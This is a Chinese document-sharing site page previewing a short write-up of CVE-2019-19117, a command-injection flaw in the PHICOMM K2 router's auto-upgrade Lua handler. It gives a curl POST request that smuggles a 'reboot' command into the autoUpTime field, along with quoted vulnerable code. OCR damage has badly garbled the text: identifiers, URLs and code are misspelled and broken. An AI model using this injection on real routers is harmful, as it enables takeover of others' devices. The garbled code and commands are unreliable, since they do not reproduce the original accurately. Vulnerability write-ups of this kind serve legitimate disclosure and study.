欢迎来到课桌文档! | 帮助中心 课桌文档-建筑工程资料库
课桌文档
全部分类
  • 党建之窗>
  • 感悟体会>
  • 百家争鸣>
  • 教育整顿>
  • 文笔提升>
  • 热门分类>
  • 计划总结>
  • 致辞演讲>
  • 在线阅读>
  • ImageVerifierCode 换一换
    首页 课桌文档 > 资源分类 > DOCX文档下载  

    (CVE-2019-19117)PHICOMM 远程代码执行.docx

    • 资源ID:641669       资源大小:8.46KB        全文页数:2页
    • 资源格式: DOCX        下载积分:5金币
    快捷下载 游客一键下载
    会员登录下载
    三方登录下载: 微信开放平台登录 QQ登录  
    下载资源需要5金币
    邮箱/手机:
    温馨提示:
    用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP免费专享
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    (CVE-2019-19117)PHICOMM 远程代码执行.docx

    (CVE-2019-19117) PHICoMM 远程代码执行一、漏洞简介通过修改HTTPPOSt请求中的内容,在根Shen上远程执行命令。二、漏洞影响PHIC0MM K2(PSG1218) V22.5.9.163三、复现过程受影响的源代码文件:usrliblualuciCOntroIIei'adminautoupgrade.lua受影响的函数:SaVe ()漏洞详情首先,在通过Web登录身份验证,会话劫持漏洞或弱凭据破解攻击以获取访问权 限后,向设备发送精心制作的数据包curl -i -s -k -v -X'POST' -e ',http:/192.168.2.lcgi-binluci;stok=xx xxxxx×xxxx" -b "sysauth=4a2c4bdba5fbl273ce62759fd42dba42" -data-bin ary "mode=l&autoUpTime=02%3A051reboot" 'http:/192.168.2.1/cgi-bin/luci /;stok=xx×admin×x××xxxx×,在此http数据包中,我们将要执行“重新引导”的命令添加到数据包内容中。 Jj%qnq, i$("#WanCheCkmodaI"). modal("show");$(N#autoUpTimeM)val($("#uptImehourN)val() ":" $(M#uptimeminM).val();SetTimeout(fnction() document. save.submit ();, 1O);我们可以看到,将'autoUpTime,的值直接分配给变量,而无需检查该值是否被恶意 修改,然后发送给服务器。function sve()local time = luci.http.forRvalue(',autoUpTtRe") local node « Iuct.http.forRvalue('node") local upgrading = "1" if node = *l thenluct.sys.cll(uct set sytteR.autoupgrade.up.ttne>%s" % tine)Iuct.sys.call(Muct set systen.autoupgrade.uptype6(a)luct.sys.call(Nuct C0Rtt system,)SCheduletask.settaskatr(systen"r HautoupgradeM, wltb auto upgrade.sh" 9 "yesM, m 16" ,"up tine,)SCheduletask.cfgscdutskbyla(, add,* /system* /(autoupgrdde,) elsetf node = " thenluct.sys.call(Nuct set systen.utouprde.up-typel")luct.sys.call(,uct CoRntt syste,t)Scheduletask. cfgscdutskbylua( "del, /systen" /,utoupgrde") endluci.http.redtrect(Iuct.dispatcher.butldaurI CadntnM ,"nore_syssetM/'autoupradeM),(node=Rde, upgrading upgrading ) end然后,服务器直接将数据附加到命令,而无需检查数据是否也被恶意修改,从而使 攻击者想要执行的命令附加到该命令。最后,路由器将执行命令"reboot

    注意事项

    本文((CVE-2019-19117)PHICOMM 远程代码执行.docx)为本站会员(夺命阿水)主动上传,课桌文档仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知课桌文档(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    备案号:宁ICP备20000045号-1

    经营许可证:宁B2-20210002

    宁公网安备 64010402000986号

    课桌文档
    收起
    展开